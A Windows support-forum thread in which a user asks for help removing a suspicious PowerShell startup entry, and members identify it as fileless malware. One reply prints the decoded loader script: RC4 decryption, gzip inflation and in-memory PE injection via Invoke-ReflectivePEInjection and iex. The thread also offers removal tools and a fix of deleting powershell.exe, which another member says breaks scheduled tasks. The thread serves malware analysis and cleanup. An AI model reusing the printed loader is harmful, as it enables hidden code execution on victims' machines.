PowerShell starts with Windows, can't disable it from msconfig.exe

YUNoCake

New member
Local time
11:43 PM
Messages
8
I have just figgured out there's a startup item in msconfig under the name of "Microsoft® Windows® Operating System". Apparently it launches the PowerShell with some weird arguments and I can't disable it. Here's a screenshot:
ZaXqyr0.jpg


I can see it's something to do with a character string, and I'm afraid it's a keylogger.
What do you think? Is it a virus? If yes, how do I remove it?

P.S.: I've tried deleting the WindowsPowerShell folder under system32 but it requires permision from TrustedInstaller to remove, and it will just not let me take the ownership of the foler. Oh, and I've searched for it in "Add or remove programs" , it's not there.
 

My Computer My Computer

At a glance

Windows 7 Ultimate 64bitIntel Pentium G20204GB @ 1333MHz CL9Sapphire R7 250X
Computer type
PC/Desktop
Computer Manufacturer/Model Number
custom build
OS
Windows 7 Ultimate 64bit
CPU
Intel Pentium G2020
Motherboard
MSI H61M-P20 (G3)
Memory
4GB @ 1333MHz CL9
Graphics Card(s)
Sapphire R7 250X
Monitor(s) Displays
Benq GL2250
Screen Resolution
1920x1080
Hard Drives
WD Caviar Green 500GB
PSU
450w
Keyboard
Microsoft Sculpt Comfort Keyboard
Mouse
Microsoft Mobile Mouse 1000
Antivirus
Microsoft Security Essentials
Browser
Google Chrome
Here's a screenshot of the registry key mentioned in the arguments
lpnhYaN.jpg
 

My Computer My Computer

At a glance

Windows 7 Ultimate 64bitIntel Pentium G20204GB @ 1333MHz CL9Sapphire R7 250X
Computer type
PC/Desktop
Computer Manufacturer/Model Number
custom build
OS
Windows 7 Ultimate 64bit
CPU
Intel Pentium G2020
Motherboard
MSI H61M-P20 (G3)
Memory
4GB @ 1333MHz CL9
Graphics Card(s)
Sapphire R7 250X
Monitor(s) Displays
Benq GL2250
Screen Resolution
1920x1080
Hard Drives
WD Caviar Green 500GB
PSU
450w
Keyboard
Microsoft Sculpt Comfort Keyboard
Mouse
Microsoft Mobile Mouse 1000
Antivirus
Microsoft Security Essentials
Browser
Google Chrome
Looks nasty to me. The fact that the PowerShell line is using the Invoke-Expression (alias: iex) cmdlet already sets of alarms. This cmdlet allows for dynamic code to be run, which is rarely something your typical script needs to do.

If you cannot disable or remove this startup item from msconfig, I'd delete the registry key the PowerShell line mentions... But before you do that, run the below Command Prompt command and post here the data of this 'GAZADSLU' value in your registry, so we can figure out what exactly the PowerShell startup line is doing.
Code:
reg query "HKCU:\Software\Classes\FYTNHRWPQH" /v "GAZADSLU"

P.S.: Please do not delete the WindowsPowerShell folder. Windows likes it there.
 

My Computer My Computer

At a glance

Windows 10, Windows 8.1 Pro, Windows 7 Profes...
Computer type
PC/Desktop
OS
Windows 10, Windows 8.1 Pro, Windows 7 Professional, OS X El Capitan
Looks nasty to me. The fact that the PowerShell line is using the Invoke-Expression (alias: iex) cmdlet already sets of alarms. This cmdlet allows for dynamic code to be run, which is rarely something your typical script needs to do.

If you cannot disable or remove this startup item from msconfig, I'd delete the registry key the PowerShell line mentions... But before you do that, run the below Command Prompt command and post here the data of this 'GAZADSLU' value in your registry, so we can figure out what exactly the PowerShell startup line is doing.
Code:
reg query "HKCU:\Software\Classes\FYTNHRWPQH" /v "GAZADSLU"

P.S.: Please do not delete the WindowsPowerShell folder. Windows likes it there.

I have just tried your command but gave me this error
jjuM0ai.png


Anyways, I have exported the registry key to a txt file using this command
KgukXfj.jpg


The export.txt file is too large to uploadid on this site, so I'll upload it here: export.txt :: Free File Hosting - File Dropper: File Host for Mp3, Videos, Music, Documents.
 

My Computer My Computer

At a glance

Windows 7 Ultimate 64bitIntel Pentium G20204GB @ 1333MHz CL9Sapphire R7 250X
Computer type
PC/Desktop
Computer Manufacturer/Model Number
custom build
OS
Windows 7 Ultimate 64bit
CPU
Intel Pentium G2020
Motherboard
MSI H61M-P20 (G3)
Memory
4GB @ 1333MHz CL9
Graphics Card(s)
Sapphire R7 250X
Monitor(s) Displays
Benq GL2250
Screen Resolution
1920x1080
Hard Drives
WD Caviar Green 500GB
PSU
450w
Keyboard
Microsoft Sculpt Comfort Keyboard
Mouse
Microsoft Mobile Mouse 1000
Antivirus
Microsoft Security Essentials
Browser
Google Chrome
I'd delete the registry key the PowerShell line mentions
Oh, by the way, that was the first thing that came into my mind, but when I try it says "Unable to delete all specified values". Any other way to get rid of it?
 

My Computer My Computer

At a glance

Windows 7 Ultimate 64bitIntel Pentium G20204GB @ 1333MHz CL9Sapphire R7 250X
Computer type
PC/Desktop
Computer Manufacturer/Model Number
custom build
OS
Windows 7 Ultimate 64bit
CPU
Intel Pentium G2020
Motherboard
MSI H61M-P20 (G3)
Memory
4GB @ 1333MHz CL9
Graphics Card(s)
Sapphire R7 250X
Monitor(s) Displays
Benq GL2250
Screen Resolution
1920x1080
Hard Drives
WD Caviar Green 500GB
PSU
450w
Keyboard
Microsoft Sculpt Comfort Keyboard
Mouse
Microsoft Mobile Mouse 1000
Antivirus
Microsoft Security Essentials
Browser
Google Chrome
Looks like a remnant of Poweliks or ZeroAccess Rootkit... have you seen signs of infection recently?

Poweliks is a malware with rootkit-like features, with no file (directly passing from registry to memory at boot time). The payload (malware file) is stored in an encrypted registry value, and loaded at boot time by a RUN key calling rundll32 process on an encrypted javascript payload.

Once payload loaded in rundll32, it tries to execute an embedded powershell script in interactive mode (no UI). That powershell scripts contains a base64-encoded payload (another one) which will be injected into a dllhost process (the persistent item), which will be zombified and act as a trojan downloader for other infections.

The dllhost injected thread is also responsible for protecting the registry value (persistence item) by recreating it when removed. This is why it’s necessary to shutdown the process first...

...Value name and Subkey name are injected with unicode characters, so that the high level API cannot read them, and remove them.
Poweliks removal:
RogueKiller Poweliks removal with RogueKiller
Eset Poweliks Cleaner ESET :: Download :: Utilities :: Detail :: Poweliks Cleaner
Google search: Poweliks removal

You should probably have a Security expert scan your system... I am NOT an expert I just play one on TV :p

HTH :)
 
Last edited:

My Computer My Computer

At a glance

Win 10 Pro x64, Win 7 Pro x64Intel Core i7-6700HQ Skylake16gb Crucial DDR4NVIDIA GeForce GTX 960M 2 GB
Computer type
Laptop
Computer Manufacturer/Model Number
MSI PE60 6QE
OS
Win 10 Pro x64, Win 7 Pro x64
CPU
Intel Core i7-6700HQ Skylake
Motherboard
MSI MS-16J5
Memory
16gb Crucial DDR4
Graphics Card(s)
NVIDIA GeForce GTX 960M 2 GB
Screen Resolution
1920 x 1080
Hard Drives
Samsung 850 EVO 250 GB M.2 SSD (MZ-N5E250BW)
HGST 1TB @7200 RPM HTS721010A9E630
Case
Plastic
Keyboard
Got one...
Mouse
Yep, one of those too.
Internet Speed
FIOS 75/75
Antivirus
Defender
Browser
Chrome/FFox/Ex-PLODE-r/(L)Edge
Other Info
Defender, Custom Hosts, uBlock, regular backups w/ Macrium (Free)
have you seen signs of infection recently?
Well, a few days ago I got one of my usb thumb drives virused with that common shortcut virus (from a library computer). I think it's because of that.
 

My Computer My Computer

At a glance

Windows 7 Ultimate 64bitIntel Pentium G20204GB @ 1333MHz CL9Sapphire R7 250X
Computer type
PC/Desktop
Computer Manufacturer/Model Number
custom build
OS
Windows 7 Ultimate 64bit
CPU
Intel Pentium G2020
Motherboard
MSI H61M-P20 (G3)
Memory
4GB @ 1333MHz CL9
Graphics Card(s)
Sapphire R7 250X
Monitor(s) Displays
Benq GL2250
Screen Resolution
1920x1080
Hard Drives
WD Caviar Green 500GB
PSU
450w
Keyboard
Microsoft Sculpt Comfort Keyboard
Mouse
Microsoft Mobile Mouse 1000
Antivirus
Microsoft Security Essentials
Browser
Google Chrome
oFcfqVj.png

Looks like it's something else, but not Powerliks
 

My Computer My Computer

At a glance

Windows 7 Ultimate 64bitIntel Pentium G20204GB @ 1333MHz CL9Sapphire R7 250X
Computer type
PC/Desktop
Computer Manufacturer/Model Number
custom build
OS
Windows 7 Ultimate 64bit
CPU
Intel Pentium G2020
Motherboard
MSI H61M-P20 (G3)
Memory
4GB @ 1333MHz CL9
Graphics Card(s)
Sapphire R7 250X
Monitor(s) Displays
Benq GL2250
Screen Resolution
1920x1080
Hard Drives
WD Caviar Green 500GB
PSU
450w
Keyboard
Microsoft Sculpt Comfort Keyboard
Mouse
Microsoft Mobile Mouse 1000
Antivirus
Microsoft Security Essentials
Browser
Google Chrome
These monsters are constantly evolving and adapting...

Which is why I suggested:

You should probably have a Security expert scan your system... I am NOT an expert I just play one on TV :p
 

My Computer My Computer

At a glance

Win 10 Pro x64, Win 7 Pro x64Intel Core i7-6700HQ Skylake16gb Crucial DDR4NVIDIA GeForce GTX 960M 2 GB
Computer type
Laptop
Computer Manufacturer/Model Number
MSI PE60 6QE
OS
Win 10 Pro x64, Win 7 Pro x64
CPU
Intel Core i7-6700HQ Skylake
Motherboard
MSI MS-16J5
Memory
16gb Crucial DDR4
Graphics Card(s)
NVIDIA GeForce GTX 960M 2 GB
Screen Resolution
1920 x 1080
Hard Drives
Samsung 850 EVO 250 GB M.2 SSD (MZ-N5E250BW)
HGST 1TB @7200 RPM HTS721010A9E630
Case
Plastic
Keyboard
Got one...
Mouse
Yep, one of those too.
Internet Speed
FIOS 75/75
Antivirus
Defender
Browser
Chrome/FFox/Ex-PLODE-r/(L)Edge
Other Info
Defender, Custom Hosts, uBlock, regular backups w/ Macrium (Free)

My Computer My Computer

At a glance

Windows 7 Ultimate 64bitIntel Pentium G20204GB @ 1333MHz CL9Sapphire R7 250X
Computer type
PC/Desktop
Computer Manufacturer/Model Number
custom build
OS
Windows 7 Ultimate 64bit
CPU
Intel Pentium G2020
Motherboard
MSI H61M-P20 (G3)
Memory
4GB @ 1333MHz CL9
Graphics Card(s)
Sapphire R7 250X
Monitor(s) Displays
Benq GL2250
Screen Resolution
1920x1080
Hard Drives
WD Caviar Green 500GB
PSU
450w
Keyboard
Microsoft Sculpt Comfort Keyboard
Mouse
Microsoft Mobile Mouse 1000
Antivirus
Microsoft Security Essentials
Browser
Google Chrome
Well I have finally found a workaround. I had to get the ownership of the powershell folder, delete the .exe and then I was able to remove that startup item. Thank you anyway and hope someone will find this info useful sometime.
 

My Computer My Computer

At a glance

Windows 7 Ultimate 64bitIntel Pentium G20204GB @ 1333MHz CL9Sapphire R7 250X
Computer type
PC/Desktop
Computer Manufacturer/Model Number
custom build
OS
Windows 7 Ultimate 64bit
CPU
Intel Pentium G2020
Motherboard
MSI H61M-P20 (G3)
Memory
4GB @ 1333MHz CL9
Graphics Card(s)
Sapphire R7 250X
Monitor(s) Displays
Benq GL2250
Screen Resolution
1920x1080
Hard Drives
WD Caviar Green 500GB
PSU
450w
Keyboard
Microsoft Sculpt Comfort Keyboard
Mouse
Microsoft Mobile Mouse 1000
Antivirus
Microsoft Security Essentials
Browser
Google Chrome
Whatever works for you 'salright I guess.:cool: At least run a scan with MBAM... RogueKiller finds all kinds of stuff too.
 

My Computer My Computer

At a glance

Win 10 Pro x64, Win 7 Pro x64Intel Core i7-6700HQ Skylake16gb Crucial DDR4NVIDIA GeForce GTX 960M 2 GB
Computer type
Laptop
Computer Manufacturer/Model Number
MSI PE60 6QE
OS
Win 10 Pro x64, Win 7 Pro x64
CPU
Intel Core i7-6700HQ Skylake
Motherboard
MSI MS-16J5
Memory
16gb Crucial DDR4
Graphics Card(s)
NVIDIA GeForce GTX 960M 2 GB
Screen Resolution
1920 x 1080
Hard Drives
Samsung 850 EVO 250 GB M.2 SSD (MZ-N5E250BW)
HGST 1TB @7200 RPM HTS721010A9E630
Case
Plastic
Keyboard
Got one...
Mouse
Yep, one of those too.
Internet Speed
FIOS 75/75
Antivirus
Defender
Browser
Chrome/FFox/Ex-PLODE-r/(L)Edge
Other Info
Defender, Custom Hosts, uBlock, regular backups w/ Macrium (Free)
My two cents worth run this through the machine Download Kaspersky Rescue Disk 10 it needs to have a bootable disk made and the BIOS set to boot from the disk or stick that the program is on.

For what it is worth I never go "looking" for malware for any reason it simply is contra to anything we are always reading about and in my mind the only malware that could use for any purpose would have to be well known and also carries the possibility of passing it on to others through whatever one does on their machine and that includes somewhere like this forum.
 

My Computer My Computer

At a glance

Desk1 7 Home Prem / Desk2 10 Pro / Main lap A...Desk1 i5 3750K / Laptop i7 GTX 860M / Desk2 i...Desk1 8GB (1866) / Desk2 16GB (1333) / Laptop...Desk 1& 2NVidia GTX 650 & Laptops on board Intel
Computer type
PC/Desktop
Computer Manufacturer/Model Number
Own build (new) Desk1 / Asus ROG Win 7 / Desk2 1st build
OS
Desk1 7 Home Prem / Desk2 10 Pro / Main lap Asus ROG 10 Pro 2 laptop Toshiba 7 Pro Asus P2520 7 & 10
CPU
Desk1 i5 3750K / Laptop i7 GTX 860M / Desk2 i5 2500
Motherboard
Desk1 Asus P877-V / Desk2 Gigabyte H67 UD3H / Laptop ?
Memory
Desk1 8GB (1866) / Desk2 16GB (1333) / Laptop 8Gb DDR3
Graphics Card(s)
Desk 1& 2NVidia GTX 650 & Laptops on board Intel
Sound Card
Desk 1 & 2 -XONAR DG Realtek High Def audio Laptop
Monitor(s) Displays
Desk 1 Benq HD 2450 / Desk2 Philips 24" / Laptop 17.5"
Screen Resolution
1920x1080 D1 & D2 & Laptop 1
Hard Drives
Desk1 Samsung 120GB 830 SSD
Asus ROG 256GB 850 Pro SSD
Desk2 Samsung 840 256 SSD
Toshiba 120GB EVO
PSU
Desk 1 Corsair HX 1050/ Laptop ? / Desk 2 Corsair HX 650
Case
Desk 1 Cooler HAF XM ? Toshiba laptop / Desk2 Coolermaster
Cooling
Fans on all Desk1 -2 Desk2 - all Coolermasters 5 Laptop ?
Keyboard
Desk 1 MS Sidewinder X6 Desk 2 MS Sidewinder X 4
Mouse
Desk 1&2 - Gigabyte MS 900 gamer - laptop - Logitec wireless
Internet Speed
ADSL2+
Other Info
One other Desktop (tester) and spare Toshba laptop both with SSD's
Running Kaspersky 2016 ISS on all machines config'd identically
Logitec audio stereo systems on each machine (x3)
Canon MG5250MFC
Router/modem TP-Link running WPA2SK
Well I have finally found a workaround. I had to get the ownership of the powershell folder, delete the .exe and then I was able to remove that startup item. Thank you anyway and hope someone will find this info useful sometime.
There are many Windows scheduled tasks that run PowerShell scripts. These will probably fail now that you deleted the exe for PowerShell.
 

My Computer My Computer

At a glance

W7 Pro SP1 64biti78GBIntel HD Graphics
Computer type
Laptop
Computer Manufacturer/Model Number
Employer provided Dell Latitude
OS
W7 Pro SP1 64bit
CPU
i7
Memory
8GB
Graphics Card(s)
Intel HD Graphics
Hard Drives
crappy SSD
Antivirus
Employer mandated Symantec Endpoint Protection
Browser
Pale Moon 64bit, IE11 64bit & Chrome 64bit
I have just tried your command but gave me this error
Oops, sorry, not sure how a colon slipped through. Actually, colons after registry hive names is how you’d reference a registry path in PowerShell. All this PowerShell talk is confusing me. The corrected Command Prompt command is,
Code:
reg query "HKCU\Software\Classes\FYTNHRWPQH" /v "GAZADSLU"
But never mind that, you’ve managed to post the string that that registry value contained in one piece. And behold, it decodes to the following script, (which is a bit long. Lobbed a few lines off),
Code:
$MEVCSVYQHEFEAP = 'FYTNHRWPQH'; 
$FMgcWUTxuAUGpoG = '{76DA0B7A-7C82-469A-AA3B-FABB6FD1AE48}';
$HLpEpbsbTddkuXUoMf = '{92624DF7-3330-41AD-A818-7B33982D7FCE}';
Function YYNIMJPQCCKGZQU{
	Param([Parameter( Position = 0, Mandatory = $true )][Byte[]]$QWtCWDrqWbRTuX,[Parameter(Position = 1, Mandatory = $true)][Byte[]]$ENKLQLMMOW)
	[Byte[]]$k = New-Object Byte[] 256;
	[Byte[]]$s = New-Object Byte[] 256;
	for ($i = 0; $i -lt 256; $i++){
		$s[$i] = [Byte]$i;
		$k[$i] = $ENKLQLMMOW[$i % $ENKLQLMMOW.Length];
	}
	$p = 0;
	for ($i = 0; $i -lt 256; $i++){
		$p = ($p + $s[$i] + $k[$i]) % 256;
		$s[$i],$s[$p] = $s[$p],$s[$i];
	}
	$i = 0;$p = 0;
	for ($c = 0; $c -lt $QWtCWDrqWbRTuX.Length; $c++){
		$i = ($i + 1) % 256;
		$p = ($p + $s[$i]) % 256;
		$s[$i],$s[$p] = $s[$p],$s[$i];
		[int]$m = ($s[$i] + $s[$p]) % 256;
		$QWtCWDrqWbRTuX[$c] = $QWtCWDrqWbRTuX[$c] -bxor $s[$m];
	}
	return $QWtCWDrqWbRTuX;
}
Function inflatebin{
	Param([Parameter( Position = 0, Mandatory = $true )]$QWtCWDrqWbRTuX)
	$memstream = New-Object System.IO.MemoryStream;
	$memstream.Write($QWtCWDrqWbRTuX, 0, $QWtCWDrqWbRTuX.Length);
	$memstream.Seek(0,0) | Out-Null;
	$gzstream = New-Object System.IO.Compression.GZipStream($memstream,[IO.Compression.CompressionMode]::Decompress);
	$reader = New-Object System.IO.StreamReader($gzstream);
	$QWtCWDrqWbRTuX = $reader.ReadToEnd();
	$reader.close();
	return $QWtCWDrqWbRTuX;
}
$qusQlVRMRdHEGECLL = [System.Text.Encoding]::ASCII.GetBytes('qkct9qPltyPEVxqdVz');
$SkVuQXvIFYKqfzFWFOMV = [System.Convert]::FromBase64String('+ncnYXTMbk4BqVTULbs92y3VO+DdkwnGz3xKwA7rs/G46H2o63lNDqQdZtg9zPMOEx4oH5PMsyk+ZU5pUzhRFv2GrjnCdjYf9vnpyasCicjQkIBCvKpm3rWq3uY2aQMDWxi9YTaFbLY770ty5yXeMaHymO3F7UdEKu4ji1QKYA33Xu1afVfALLXOwBpOhZL28Ww9CtLUHkagUzzIpbq1HcnxHuJjORbu5MX+lGLsytfgnsskenFKnWG36AeLBKf9tt9eiGVotIfPMuR7xlC7IU8QKhMX7sP2LnbqhhlhmzmQePXt9hsyotNL76G5mSZap4oVLPp6zBN41dF
[COLOR="Silver"][... ... ...][/COLOR]
SgoDiWDpZyXi1sOTK2crN8twGGABJQkvO2AWPtswIYO+1mcMsyqD8eY33O5dpZh+NK3PpUPyn4cNx4hQ8IanBUZMPMIxx6FxUQyVxQiLgJN7RtstQ+YQJOi1y2bf81kyBeLiqxONXOF24cTvZ0U23n+d4gdhYR3XpgmVIikOZuNKDAXLM0mJxTTzEfCAhXU8S/5MMx1FZle6JjS47sJ3wXrMYCk/gOcqNQqrDxWw0IojQUQnmASez4bWSbAPOjO0tGRZFxnzEhf0Amq1I0uaw');
$SkVuQXvIFYKqfzFWFOMV = YYNIMJPQCCKGZQU -QWtCWDrqWbRTuX $SkVuQXvIFYKqfzFWFOMV -ENKLQLMMOW $qusQlVRMRdHEGECLL
$SkVuQXvIFYKqfzFWFOMV = inflatebin -QWtCWDrqWbRTuX $SkVuQXvIFYKqfzFWFOMV

$PRIMNMSFSZY = 'HKCU:\Software\Classes\' + $MEVCSVYQHEFEAP;
$JMQJRCFCXMMNCDMDKDI = '';
if ([IntPtr]::Size -eq 8) {
	$JMQJRCFCXMMNCDMDKDI = (Get-ItemProperty -Path $PRIMNMSFSZY -Name $FMgcWUTxuAUGpoG).$FMgcWUTxuAUGpoG;
}else{
	$JMQJRCFCXMMNCDMDKDI = (Get-ItemProperty -Path $PRIMNMSFSZY -Name $HLpEpbsbTddkuXUoMf).$HLpEpbsbTddkuXUoMf;
}
$JMQJRCFCXMMNCDMDKDI = YYNIMJPQCCKGZQU -QWtCWDrqWbRTuX $JMQJRCFCXMMNCDMDKDI -ENKLQLMMOW $qusQlVRMRdHEGECLL
#$JMQJRCFCXMMNCDMDKDI = inflatebin2 -QWtCWDrqWbRTuX $JMQJRCFCXMMNCDMDKDI

$SkVuQXvIFYKqfzFWFOMV = $SkVuQXvIFYKqfzFWFOMV + 'Invoke-ReflectivePEInjection -PEBytes $JMQJRCFCXMMNCDMDKDI;'
iex $SkVuQXvIFYKqfzFWFOMV;
At a glance, there is not much that can be gathered; it’s almost as obfuscated as it was encoded… But there is one clue in the script that will tell us if it lives for good or evil. On line 53, the second last line of the script, a particular cmdlet is mentioned within a string—Invoke-ReflectivePEInjection—and this cmdlet does not exist in any standard builtin PowerShell module. Let’s give it a Google now…

Okay, first link brings us to this GitHub page. Invoke-ReflectivePEInjection appears to be part of a module called CodeExecution, which is included in a library of modules called PowerSploit. A PowerShellMagazine article explains what PowerSploit is and what it's capable of doing:
PowerSploit is an offensive security framework for penetration testers and reverse engineers. It was born out of the realization that PowerShell was the ideal post-exploitation utility in Windows due to its ability to perform a wide range of administrative and low-level tasks all without the need to drop malicious executables to disk, thus, evading antivirus products with ease.

The PowerSploit GitHub repository offers a briefing of what CodeExecution's Invoke-ReflectivePEInjection cmdlet does:
Injects a Dll into the process ID of your choosing
And some further insight obtained from this other website:
Invoke-ReflectivePEInjection is a PowerShell script which can reflectively load and execute a windows PE file such as an EXE or DLL inside the PowerShell process on a remote computer without writing to disk. This is accomplished by (partially) rewriting the Win32 functionality which loads EXEs/DLLs in PowerShell.

Lastly, it's worth mentioning, Clymb3r, the author of PowerSploit according to the GitHub repository, has a WordPress blog where he shows off his "hacking and general mayhem" techniques.

Also, in YUNoCake's startup script, the Invoke-ReflectivePEInjection cmdlet uses the 'PEBytes' parameter, which was added 8 months ago, so YUNoCake's acquired script must have been a fairly recent build.
 

My Computer My Computer

At a glance

Windows 10, Windows 8.1 Pro, Windows 7 Profes...
Computer type
PC/Desktop
OS
Windows 10, Windows 8.1 Pro, Windows 7 Professional, OS X El Capitan
Very well done research Pyprohly!
 

My Computer My Computer

At a glance

Windows 10 Pro. 64/ version 1709 Windows 7 Pr...Intel i7-6800K @ 4.3Corsair Platinum 16 gig @2400EVGA GTX 1070 OC
Computer type
PC/Desktop
Computer Manufacturer/Model Number
Home made Desktop
OS
Windows 10 Pro. 64/ version 1709 Windows 7 Pro/64
CPU
Intel i7-6800K @ 4.3
Motherboard
ASUS X-99 Deluxe II
Memory
Corsair Platinum 16 gig @2400
Graphics Card(s)
EVGA GTX 1070 OC
Monitor(s) Displays
Asus 27" LED LCD/VE278Q
Screen Resolution
1920-1080 or 1280-720 HDMI
Hard Drives
INTEL SSD 730-240 Gb Sata 3.0/
PSU
EVGA Platium 1200W
Case
Phanteks Luxe Tempered Glass 8 fans/ one radiator
Cooling
XSPC/ Water Cooled CPU
Keyboard
Das 4 Professional
Mouse
Logitech M705/MX Anywhere 2-S
Internet Speed
100 mbits
Antivirus
Microsoft Security Essentials/ Malwarebytes Premium 3.0/ SAS
Browser
I.E. 11 default/Firefox/ ISP Time Warner Cable/Spectrum
Other Info
LG BluRay Burner/
Sound system-KLipsch-THX/
Icy Dock ssd Hot Swap bays.
Very well done research Pyprohly!
:ditto:That P that stuff might as well be in Klingon to me (most of it is LOL!!) - seriously am impressed and if I could rep you I would ;)
 

My Computer My Computer

At a glance

Desk1 7 Home Prem / Desk2 10 Pro / Main lap A...Desk1 i5 3750K / Laptop i7 GTX 860M / Desk2 i...Desk1 8GB (1866) / Desk2 16GB (1333) / Laptop...Desk 1& 2NVidia GTX 650 & Laptops on board Intel
Computer type
PC/Desktop
Computer Manufacturer/Model Number
Own build (new) Desk1 / Asus ROG Win 7 / Desk2 1st build
OS
Desk1 7 Home Prem / Desk2 10 Pro / Main lap Asus ROG 10 Pro 2 laptop Toshiba 7 Pro Asus P2520 7 & 10
CPU
Desk1 i5 3750K / Laptop i7 GTX 860M / Desk2 i5 2500
Motherboard
Desk1 Asus P877-V / Desk2 Gigabyte H67 UD3H / Laptop ?
Memory
Desk1 8GB (1866) / Desk2 16GB (1333) / Laptop 8Gb DDR3
Graphics Card(s)
Desk 1& 2NVidia GTX 650 & Laptops on board Intel
Sound Card
Desk 1 & 2 -XONAR DG Realtek High Def audio Laptop
Monitor(s) Displays
Desk 1 Benq HD 2450 / Desk2 Philips 24" / Laptop 17.5"
Screen Resolution
1920x1080 D1 & D2 & Laptop 1
Hard Drives
Desk1 Samsung 120GB 830 SSD
Asus ROG 256GB 850 Pro SSD
Desk2 Samsung 840 256 SSD
Toshiba 120GB EVO
PSU
Desk 1 Corsair HX 1050/ Laptop ? / Desk 2 Corsair HX 650
Case
Desk 1 Cooler HAF XM ? Toshiba laptop / Desk2 Coolermaster
Cooling
Fans on all Desk1 -2 Desk2 - all Coolermasters 5 Laptop ?
Keyboard
Desk 1 MS Sidewinder X6 Desk 2 MS Sidewinder X 4
Mouse
Desk 1&2 - Gigabyte MS 900 gamer - laptop - Logitec wireless
Internet Speed
ADSL2+
Other Info
One other Desktop (tester) and spare Toshba laptop both with SSD's
Running Kaspersky 2016 ISS on all machines config'd identically
Logitec audio stereo systems on each machine (x3)
Canon MG5250MFC
Router/modem TP-Link running WPA2SK
Well I have finally found a workaround. I had to get the ownership of the powershell folder, delete the .exe and then I was able to remove that startup item. Thank you anyway and hope someone will find this info useful sometime.

i have a particularly nasty and invasive bug on my system and have this exact same problem -- operating on windows 10 w/out much knowledge of computechs..is there anyone who has experienced this who may be able to help out? will this work around work on windows 10? and Y@YUNoCake -- are you still around? i would like to compare notes (if you have any); longshot since this is from 6 years ago but thought i would try

i would like to note that if possible i would like to \o find the person / persons responsible for the virus or see if there is a way to trace it back to its original inception on my computer....is that a thing?
 
Last edited:

My Computers My Computers

  • At a glance

    windows 10 64bit(?)kindaidktwo
    Computer type
    Laptop
    Computer Manufacturer/Model Number
    hp
    OS
    windows 10 64bit(?)
    CPU
    kinda
    Motherboard
    im sure
    Memory
    idk
    Graphics Card(s)
    two
    Hard Drives
    i am most days
    Antivirus
    no, dont rub it in
    Browser
    chromEEEE
  • Computer type
    PC/Desktop

My Computer My Computer

At a glance

W7 home premium 32bit/W7HP 64bit/w10 tp insid...E5300 dual core3gbNvidia Geforce 7100 Nforce 630i
Computer type
PC/Desktop
Computer Manufacturer/Model Number
medionl/Aspire 6930G/acer x55a
OS
W7 home premium 32bit/W7HP 64bit/w10 tp insider ring
CPU
E5300 dual core
Motherboard
medion MS7366
Memory
3gb
Graphics Card(s)
Nvidia Geforce 7100 Nforce 630i
Monitor(s) Displays
avixc
Internet Speed
n (isp resticted to 72)
Antivirus
mse/pands
Browser
palemoon
Other Info
Belkin Fd7050 n USB using Railink RT2870 drivers, more upto date
Back
Top